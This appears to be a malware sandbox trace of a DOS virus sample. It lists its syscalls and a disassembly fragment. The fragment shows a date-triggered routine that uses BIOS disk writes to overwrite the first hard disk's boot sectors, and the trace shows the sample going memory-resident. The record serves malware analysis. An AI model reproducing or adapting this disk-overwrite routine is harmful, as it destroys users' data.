Sample viewer

vx.netlux.org/Virus.DOS.FaxFree.Mecojoni.d

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:34:16.279710859Z 74 PC: 12d1e | Reallocate memory
2018-12-17T22:34:16.283603289Z 72 PC: 12d25 | Allocate memory
2018-12-17T22:34:16.285803495Z 44 PC: 13469 | Get time 0x13469: mov byte ptr cs:[0x51], cl
0x1346e: cmp cl, 0x1e
0x13471: jne 0x134a6
0x13473: mov dl, 0x80
0x13475: mov dh, 0
0x13477: mov ch, 0
0x13479: mov cl, 1
0x1347b: mov al, 9
0x1347d: mov ah, 3
0x1347f: int 0x13
0x13481: mov dl, 0x80
0x13483: mov dh, 1
0x13485: mov ch, 0
0x13487: mov cl, 1
0x13489: mov al, 9
0x1348b: mov ah, 3
0x1348d: int 0x13
0x1348f: mov dx, 0x357
0x13492: mov ah, 9
0x13494: int 0x21
2018-12-17T22:34:16.290527774Z 72 PC: 13265 | Allocate memory
2018-12-17T22:34:16.292697057Z 75 PC: 132a5 | Execute program
2018-12-17T22:34:16.310617089Z 76 PC: 13934 | Terminate with return code (Return code = '0')
2018-12-17T22:34:16.315358289Z 53 PC: 132b9 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:34:16.317101269Z 37 PC: 132d0 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:34:16.318795127Z 77 PC: 132d4 | Get program return code
2018-12-17T22:34:16.321147722Z 49 PC: 132db | Terminate and stay resident (Return code = '0' | Memory size = '96')